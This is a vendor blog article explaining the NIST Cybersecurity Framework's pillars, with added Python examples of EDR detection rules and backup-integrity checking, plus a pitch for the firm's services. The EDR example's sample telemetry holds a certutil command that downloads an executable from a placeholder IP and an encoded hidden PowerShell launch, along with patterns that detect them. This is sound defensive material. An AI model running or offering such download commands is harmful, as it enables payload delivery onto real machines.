Unlocking the Power of NIST for a Stronger Cyber Security Strategy
If you’re trying to formulate a cyber security strategy for your business, then the NIST framework is a great place to start.
Founded in 1901, the National Institute of Standards and Technology (or NIST) is one of the US’ oldest science labs (1). It devised measurements and guidelines that helped America develop a power grid, as well as electronic health records and atomic clocks.
NIST first published its Cybersecurity Framework (CSF) in February 2014, in response to a 2013 US executive order on critical infrastructure; it was revised to version 1.1 in 2018 and to version 2.0 in February 2024. The framework sets out industry standards and best practices to help organisations better manage their cybersecurity operations. For anyone looking to create or revise their company’s cyber security strategy, the NIST framework covers the ground comprehensively. Gartner’s Technical Professional Advice: Security Frameworks report rates NIST (alongside ISO 27001) as the most effective IT security risk management framework (2). By one estimate, around 50% of companies follow the NIST cybersecurity guidelines in their cybersecurity operations (3).
Understanding the NIST Framework
Cybersecurity is an integral part of running a business in today’s world. Companies’ IT systems contain vast amounts of valuable business and customer data. Any breaches can lead to dramatic financial and reputational consequences. At the same time, cyber attackers get more sophisticated in the technology they utilise and the methods they employ to get into organisations’ systems.
The NIST cybersecurity framework aims to help businesses (regardless of size, industry or geography) understand, manage and reduce their risk exposure to cyber security threats. By sharing best practices and setting out guidelines, NIST helps businesses understand where to focus their budget, time and effort to protect their IT networks and data.
The core of the framework (in version 1.1) is five Functions, which this article calls pillars: Identify, Protect, Detect, Respond and Recover. Version 2.0 adds a sixth, Govern, which covers risk strategy, roles, responsibilities and oversight. We’ll look at each of the five in more detail later in this article. When you follow the framework in these areas, you’ll create a cyber security strategy that addresses cyber security threats and boosts your cyber resilience.
The Importance of a Strong Cyber Security Strategy
A robust cyber security strategy can deliver several significant business benefits:
- Prevent costly downtime – Imagine if you had to take your company offline due to a cyber-attack. How much customer business would you lose?
- Avoid legal repercussions – Fines for data breaches can be expensive. In October 2023, the UK Financial Conduct Authority fined Equifax Ltd £11 million for failing to manage the security of UK customer data (4).
- Safeguard your reputation – Being the victim of a cyberattack, which you could have prevented, can destroy trust between you and your customers.
- Win more business – If you can demonstrate to potential customers that you have taken all necessary steps to safeguard their valuable data, it could be the difference between them using you or a competitor
- Upskill your people – IBM reported that human error was a contributing factor in 95% of the security incidents it analysed (5). When you educate your employees on best cyber security practices, they gain skills that will serve them into the future
NIST is a well-established, widely adopted way to create a cyber security strategy that delivers these benefits and more. Now, let’s look at the NIST framework in more detail.
The Five Pillars of NIST
The NIST framework consists of five components (or pillars). Each pillar represents a set of questions to answer and objectives to achieve. When you combine them, you have the basis for an effective cyber security strategy that covers the full lifecycle of an incident, from preparation through to recovery.
The five pillars are:
- Identify – What assets and data does your business depend on, and what types of cyber threats pose a risk to them?
- Protect – How do you effectively safeguard the assets you identified?
- Detect – How will you find out if there are cyber threats against your assets?
- Respond – If you detect cyber security threats, what’s your action plan?
- Recover – If a cyber-attack impacts your infrastructure and wider business, how will you fix it and bounce back?
At Doherty, we recommend businesses focus on a cyber security strategy that leverages the five pillars of NIST. With this proven approach, you can create a strategy aligned with your goals that supports you in allocating your budget efficiently.
Now, let’s look at each of these pillars in more detail.
1 – Identify
The first part of the NIST framework involves understanding your organisation’s risk appetite, specific concerns and exposure. Begin by auditing your assets. Your assets could range from the hardware and devices your employees use to the valuable customer data stored in your CRM. Use this audit to identify your priority areas which require the greatest protection.
Your organisation’s cyber security is only as good as its weakest link, so make sure you include third parties such as suppliers and contractors in your risk assessments. Send questionnaires to the vendors and contractors you work with, and record which of them hold credentials, VPN access or integrations into your systems. Anyone with access to your network – including third parties – can present a way in for cyber attackers. Knowing how they manage their cybersecurity gives you a better picture of where you stand.
2 – Protect
How will you protect your identified assets? The ‘protect’ pillar covers the controls you will use to keep cyber attackers at bay. You’re likely familiar with firewalls, password policies, the importance of frequent patching and other preventative measures. These have been used for many years and still have their place. The framework also expects controls that many smaller organisations have yet to adopt fully: multi-factor authentication on every remote and administrative login, least-privilege access so that a compromised account or supplier cannot reach everything, encryption of data at rest and in transit, and security awareness training for staff.
3 – Detect
Speed is of the essence in cyber security. If you can discover a cyber threat as soon as it emerges, there’s a chance you can deal with it before it’s too late. This pillar is about creating visibility: tools deployed throughout your IT infrastructure, watching your network, users and external actors. By detecting potential cyber threats in real-time, you can move quickly on to the respond and recover stages.
Some examples of cyber detection tools are Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR). Let’s look at these in turn:
- EDR – Runs an agent on each endpoint (laptops, desktops and servers), recording process launches, file and registry changes, logins and network connections around the clock. The platform evaluates this telemetry against behavioural rules and known attacker techniques; when it detects a threat it can kill the process, quarantine the file or isolate the host from the network while you investigate
- XDR – Extends the same approach beyond endpoints, correlating telemetry from identity providers, email, cloud services, mobile devices and the network so that one incident is seen as a whole rather than as disconnected alerts in separate tools. Like EDR, it can act in real time on detected cyber threats
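To make the EDR description above concrete, here is a small added example (not code from the original article or from any EDR product) of the kind of behavioural rules such tools run over endpoint telemetry. The process events, host names, user names and the encoded PowerShell string are all constructed for illustration; the rules are simplified versions of common detections (an Office application spawning a scripting host, PowerShell run with an encoded command, and certutil used to download a file).

```python
"""Toy endpoint-detection logic in the spirit of an EDR rule engine.

Added example: the events below are constructed sample telemetry, not real
logs, and the rules are deliberately simple.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process start recorded by an endpoint agent (constructed)."""
    host: str
    user: str
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str


# Constructed sample events: two benign, two that look like initial access.
SAMPLE_EVENTS = [
    ProcessEvent("LAPTOP-01", "alice", "explorer.exe", "winword.exe",
                 "winword.exe /n report.docx"),
    ProcessEvent("LAPTOP-01", "alice", "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="),
    ProcessEvent("SRV-FILE-02", "svc_backup", "services.exe", "robocopy.exe",
                 "robocopy.exe D:\\data E:\\backup /MIR"),
    ProcessEvent("LAPTOP-07", "bob", "outlook.exe", "cmd.exe",
                 "cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"),
    ProcessEvent("LAPTOP-07", "bob", "explorer.exe", "chrome.exe", "chrome.exe"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# (rule id, description, predicate over a ProcessEvent)
RULES = [
    ("office-spawns-shell",
     "Office application launched a scripting host",
     lambda e: e.parent.lower() in OFFICE_APPS and e.image.lower() in SHELLS),
    ("encoded-powershell",
     "PowerShell launched with an encoded command",
     lambda e: e.image.lower() == "powershell.exe"
     and re.search(r"\s-(enc|encodedcommand|e)\s", e.cmdline, re.I) is not None),
    ("lolbin-download",
     "certutil used to fetch a file from the internet",
     lambda e: re.search(r"certutil.*-urlcache.*https?://", e.cmdline, re.I) is not None),
]


def evaluate(events):
    """Run every rule over every event; return (rule_id, host, user, image) per match."""
    alerts = []
    for e in events:
        for rule_id, _desc, predicate in RULES:
            if predicate(e):
                alerts.append((rule_id, e.host, e.user, e.image))
    return alerts


def hosts_to_isolate(alerts):
    """EDR-style automated response: any host with an alert is a candidate for isolation."""
    return sorted({host for _rule, host, _user, _image in alerts})


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for rule_id, host, user, image in found:
        print(f"ALERT {rule_id}: {image} run by {user} on {host}")
    print("Isolate:", hosts_to_isolate(found))
```

Real products have thousands of such rules plus machine-learning models, and they weight and correlate alerts rather than firing on every match; the point here is that detection is driven by what processes do on the endpoint, not by watching a network perimeter.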
4 – Respond
‘Detect’ and ‘Respond’ go hand in hand. Once you’ve detected a cyber threat, whether through EDR, XDR or a report from a member of staff, do the right thing about it as quickly as possible.
A well-formed cyber security strategy will include appropriate steps as part of the respond phase.
Different organisations will have different response plans. But here are some steps you may choose to take:
- Bring in a third-party data forensics team to help you determine the source of the attack, the areas impacted and how to respond
- Notify the police and your relevant regulators. Note the deadlines: under UK GDPR, a personal data breach must be reported to the ICO within 72 hours of becoming aware of it, unless it is unlikely to pose a risk to individuals
- Contain the breach. Isolate affected systems from the network and restrict access to them, but preserve logs, memory and disk images before you wipe or rebuild anything, or the forensics team above will have nothing to work from. Remember, the breach could have come from someone inside your company. Trust no one
- Minimise the chance of additional breaches by forcing password resets on everyone who had access to the infiltrated system, and revoke any active sessions, API keys and tokens at the same time, since a reset alone does not end a session the attacker already holds
- Interview the employees who discovered the breach. Ask anyone who may know something to come forward
- Notify other affected organisations (e.g. suppliers) or people affected by the breach
- Get ahead of the story by planning a PR strategy. How you’re seen to respond at this stage could be the difference between emerging with an enhanced or destroyed reputation
5 – Recover
Once you’ve dealt with the threat, it’s time to get your business back to normal operations again. This stage is where you demonstrate your cyber resilience.
Firstly, as part of your NIST-backed cyber security strategy, you’ll have a recovery plan in place. This plan should include data backups and cyber insurance. Backups only count if at least one copy is kept offline or immutable, where ransomware that has your administrator credentials cannot reach it, and if you have actually tested a restore from them. While you never asked for a cyber-attack, accept that you can’t prevent every breach. Follow your plan and you’ll rebuild stronger.
Next, determine which business processes were disrupted by the cyber-attack and create a new action plan designed for the precise situation. This may include helping your employees adapt to new processes while you repair the IT setup, such as calling suppliers rather than emailing them.
The final phase of recovery is about getting back to business as usual. This could include restoring from backups of your system and data (as recommended by NIST), or rebuilding your systems from scratch. However, the way you return to normal service will depend on the nature of the scenario.
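Before restoring from a backup, you need to know that the copy is the one you made and has not been altered or encrypted since. The following added example (not from the original article or any backup product) shows one way to do that: record a SHA-256 manifest when the backup is taken, store the manifest separately from the backup, and verify the files against it before a restore. The backup contents, paths and the simulated tampering are all constructed for the demonstration.

```python
"""Backup integrity check: build a hash manifest at backup time, verify before restore.

Added example with constructed data. The manifest should be kept somewhere the
backup storage cannot overwrite it (assumption: an offline or write-once location),
otherwise an attacker who encrypts the backup can rewrite the manifest too.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large backups do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(backup_root: Path) -> dict:
    """Map each file's path (relative to the backup root) to its SHA-256."""
    return {
        p.relative_to(backup_root).as_posix(): sha256_file(p)
        for p in sorted(backup_root.rglob("*"))
        if p.is_file()
    }


def verify_backup(backup_root: Path, manifest: dict) -> dict:
    """Compare the backup on disk with the manifest recorded when it was taken."""
    current = build_manifest(backup_root)
    return {
        "ok": sorted(k for k in manifest if current.get(k) == manifest[k]),
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "unexpected": sorted(k for k in current if k not in manifest),
    }


def safe_to_restore(report: dict) -> bool:
    """Restore only if nothing changed; a single modified file means the copy is suspect."""
    return not (report["modified"] or report["missing"] or report["unexpected"])


def demo() -> dict:
    """Create a constructed backup, record its manifest, tamper with it, then verify."""
    root = Path(tempfile.mkdtemp()) / "backup"
    (root / "crm").mkdir(parents=True)
    (root / "crm" / "customers.csv").write_text("id,name\n1,Example Ltd\n")
    (root / "config.ini").write_text("[db]\nhost=db01\n")
    manifest = build_manifest(root)  # taken at backup time, stored offline

    # Simulate ransomware reaching the backup share: one file encrypted,
    # one deleted, and a ransom note dropped.
    (root / "crm" / "customers.csv").write_bytes(b"\x00encrypted\x00")
    (root / "config.ini").unlink()
    (root / "README.txt").write_text("your files have been encrypted\n")

    return verify_backup(root, manifest)


if __name__ == "__main__":
    report = demo()
    for status, files in report.items():
        print(f"{status:10s} {files}")
    print("safe to restore:", safe_to_restore(report))
```

In practice the manifest would be signed or stored alongside an immutable backup snapshot, and the same check would run as part of a scheduled restore test rather than only during an incident.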
Benefits of Incorporating NIST Principles
When you align your cybersecurity strategy with the five pillars of NIST, you gain five key benefits:
- Enhanced Security – The cybersecurity industry regards NIST as the gold standard strategic framework. By applying the five pillars to your strategy, your cybersecurity posture will be more robust, holistic and complete
- Risk Mitigation – The Identify and Protect pillars of the NIST framework help you reduce potential risks and vulnerabilities. You also take a proactive approach to cyber risk, rather than simply reacting once the threat has already emerged
- Regulatory Compliance – NIST cybersecurity guidelines steer organisations on multiple aspects of cybersecurity, including employee awareness, for example (6). Following these will help you comply with relevant regulations in your industry, avoiding potentially costly or damaging fines
- Improved Incident Response – Responding to a cyber-attack is all about speed and pinpointed action. The pillars of NIST help you get a plan in place, so if the worst happens, everyone knows what to do
- Benchmarking – NIST gives a framework to measure your performance against industry standards. The framework’s Implementation Tiers (from Partial to Adaptive) and Profiles let you describe your current posture and your target posture in the same terms. An assessment of your organisation’s posture against the NIST framework can help educate and inform both internal and external stakeholders (such as investors or board members) about cyber security preparedness.
Implementing NIST Principles In Your Cybersecurity Strategy
Now you know what the NIST framework is, how it works, and the benefits it delivers, it’s time to get started incorporating it into your cybersecurity strategy. But knowing where to begin is hard, especially if you’re an organisation without a dedicated cybersecurity function.
That’s where Doherty Associates comes in.
Trust the approachable experts at Doherty to do the heavy lifting for you. While it’s great to be aware of NIST, our professionals can apply the full detail of the framework to create a cyber security strategy that hits the compliance standards you require in your business.
Doherty Associates can help you apply multiple parts of the NIST framework, including:
- Assessment and Gap Analysis – Before you begin formulating your strategy, you need to know the current state of your cybersecurity compared to where you want to be
- Adoption and Customisation – The NIST framework is relevant to every industry, but might require some tweaking so you can get the most benefit from it. We’ll help you adapt and customise your strategy to match your needs
- Training and Awareness – Your employees need to know why NIST is important and how to best implement its principles
- Ongoing Monitoring and Updates – The job of cybersecurity is never finished. You need to continuously monitor, evaluate and iterate your strategy to stay aligned with evolving NIST guidelines
To create a cyber security strategy that protects against cyber threats, then sets out a plan to respond and recover should the worst happen, it’s essential to incorporate the NIST principles. Through its five pillars, you can rest assured that you have all your bases covered. It’s also a very efficient way to plan an effective cybersecurity strategy, ensuring your cyber security spending is well aligned with business priorities.
Partnering with a managed service provider (MSP) like Doherty Associates makes bringing NIST principles into your business simple. However, selecting the right MSP for long-term success is essential. Look for an MSP partner with the right experience, reputation, service offerings and pricing to suit your requirements.
While we’ve only scratched the surface in this article – entire books have been written about NIST – this blog should help you ask the right questions to potential MSP partners, showing them you understand the principles behind the NIST Cybersecurity Framework.
To find out more about Doherty Associates, visit our Services page.
1 – About NIST
2 – Gartner – Security Frameworks: The What and Why, and How to Select Yours
3 – Auditboard – NIST Cybersecurity Framework (CSF) Controls Fundamentals
4 – FCA – Financial watchdog fines Equifax Ltd £11 million for role in one of the largest cyber security breaches in history
5 – IBM Cyber Security Intelligence Index Report 2022
6 – NIST employee awareness guidance